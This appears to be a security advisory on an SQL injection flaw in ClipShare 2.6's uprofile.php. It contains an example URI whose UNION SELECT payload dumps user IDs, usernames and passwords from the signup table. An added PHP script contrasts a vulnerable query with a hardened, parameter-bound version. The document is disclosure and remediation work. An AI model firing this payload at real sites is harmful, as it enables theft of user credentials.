ClipShare 2.6 uprofile.php SQL Injection Vulnerability
This security issue was primarily reported by Krit. and Pr0metheuS. ClipShare, a leading PHP video sharing script, has an SQL injection vulnerability in its user profile page (uprofile.php). The application does not properly sanitize the user-supplied UID value before using it in an SQL query. Attackers can use this flaw to access or alter the user database.
Example URI:
http://www.example.com/uprofile.php?UID=1+and+1=2+union+select+1,2,concat(uid,char(58),username,char(58),pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+signup+limit+0,20/*
ClipShare has not issued any patch to fix this issue. If you have an idea for fixing it, or have a patch, please share it here so others can benefit from your contribution.
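
One way to close this class of bug, shown as an added example that is not ClipShare's code or a vendor patch: validate UID as a positive integer and bind it as a query parameter instead of concatenating it into the SQL text. The `signup` table and its `uid`, `username` and `pwd` columns come from the example URI above; the query shape, the function names and the in-memory SQLite database with constructed rows are assumptions made so the script runs on its own.

```php
<?php
// Added example, not ClipShare source. Schema names come from the example URI;
// the query shape and function names are hypothetical.

// Constructed in-memory database standing in for the real one.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE signup (uid INTEGER PRIMARY KEY, username TEXT, pwd TEXT)');
$db->exec("INSERT INTO signup VALUES (1, 'alice', 'constructed-hash-1'), (2, 'bob', 'constructed-hash-2')");

// Vulnerable pattern: the request value becomes part of the SQL text.
function profile_vulnerable(PDO $db, string $uid): array
{
    $sql = 'SELECT uid, username FROM signup WHERE uid = ' . $uid;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: accept only a positive integer, then bind it as a typed parameter.
function profile_hardened(PDO $db, string $uid): array
{
    $id = filter_var($uid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        // Invalid input never reaches the database; the page should answer 400/404.
        throw new InvalidArgumentException('UID must be a positive integer');
    }
    $stmt = $db->prepare('SELECT uid, username FROM signup WHERE uid = :uid');
    $stmt->bindValue(':uid', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// '1 and 1=2' is the decoded start of the example URI's UID value.
foreach (['1', '1 and 1=2'] as $input) {
    $vulnerable = count(profile_vulnerable($db, $input)) . ' row(s)';
    try {
        $hardened = count(profile_hardened($db, $input)) . ' row(s)';
    } catch (InvalidArgumentException $e) {
        $hardened = 'rejected before query';
    }
    echo "UID=[$input] vulnerable: $vulnerable; hardened: $hardened\n";
}
```

With the vulnerable function, the row count changes between the two inputs because the text after the ID is executed as SQL; the hardened function refuses the second input outright.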